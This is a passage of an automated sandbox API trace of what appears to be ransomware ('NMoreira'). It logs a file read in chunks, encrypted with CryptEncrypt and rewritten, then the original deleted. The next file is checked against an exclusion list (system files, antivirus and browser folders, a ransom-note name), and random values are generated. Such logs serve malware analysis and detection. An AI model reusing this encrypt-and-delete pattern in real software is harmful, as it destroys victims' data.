lpOverlapped=0x0) returned 1 [0170.000] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.000] GetLastError () returned 0x0 [0170.000] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.000] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.000] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.000] GetLastError () returned 0x0 [0170.000] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.000] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.000] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.000] GetLastError () returned 0x0 [0170.000] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.000] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.001] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.001] GetLastError () returned 0x0 [0170.001] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.001] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.001] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.001] GetLastError () returned 0x0 [0170.001] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.001] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.001] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.001] GetLastError () returned 0x0 [0170.001] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.001] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.001] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.001] GetLastError () returned 0x0 [0170.001] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.002] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.002] GetLastError () returned 0x0 [0170.002] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.002] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.002] GetLastError () returned 0x0 [0170.002] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.002] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.002] GetLastError () returned 0x0 [0170.002] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.002] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.002] GetLastError () returned 0x0 [0170.002] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.002] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.002] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.002] GetLastError () returned 0x0 [0170.003] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.003] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.003] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.003] GetLastError () returned 0x0 [0170.003] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.003] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.003] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.003] GetLastError () returned 0x0 [0170.003] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.003] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.003] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.003] GetLastError () returned 0x0 [0170.003] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.003] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.003] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.003] GetLastError () returned 0x0 [0170.003] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.004] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.004] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.004] GetLastError () returned 0x0 [0170.004] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.004] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.004] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.004] GetLastError () returned 0x0 [0170.004] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.004] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.004] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.004] GetLastError () returned 0x0 [0170.004] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.004] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.004] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0170.005] GetLastError () returned 0x0 [0170.005] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0170.005] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0170.005] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0170.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui")) returned 0x20 [0170.005] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui", dwFileAttributes=0x20) returned 0 [0170.006] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned 1 [0170.006] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui")) returned 0 [0170.006] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" [0170.007] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 1 [0170.007] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXBC1.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxbc1.tmp")) returned 0xbc1 [0170.008] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\oledb32r.dll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\oledb32r.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXBC1.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxbc1.tmp"), dwFlags=0x1) returned 0 [0170.008] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXBC1.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxbc1.tmp")) returned 1 [0170.008] CryptDestroyKey (hKey=0x9ad238) returned 1 [0170.009] wcslen (_String="OK") returned 0x2 [0170.009] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.009] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.009] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0170.009] CryptDestroyHash (hHash=0x9ad6b8) returned 1 [0170.009] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0170.009] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*NMCRYPT") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*Recovers your files.html") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.exe") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.dll") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.lnk") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.bat") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.ini") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.msi") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*.scf") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*pagefile.sys*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*AppData*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\winrar\\*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\java\\*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\windows\\*") returned 0 [0170.009] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\ESET\\*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\AVG\\*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*Atheros*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*Realtek*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*bootmgr*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*boot*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*boot*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*IO.SYS*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*ntldr*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*chrome*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*opera*") returned 0 [0170.010] PathMatchSpecW (pszFile="sqloledb.rll.mui", pszSpec="*firefox*") returned 0 [0170.010] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", pszSpec="*") returned 1 [0170.010] strlen (_Str="NMoreira") returned 0x8 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.010] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.011] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 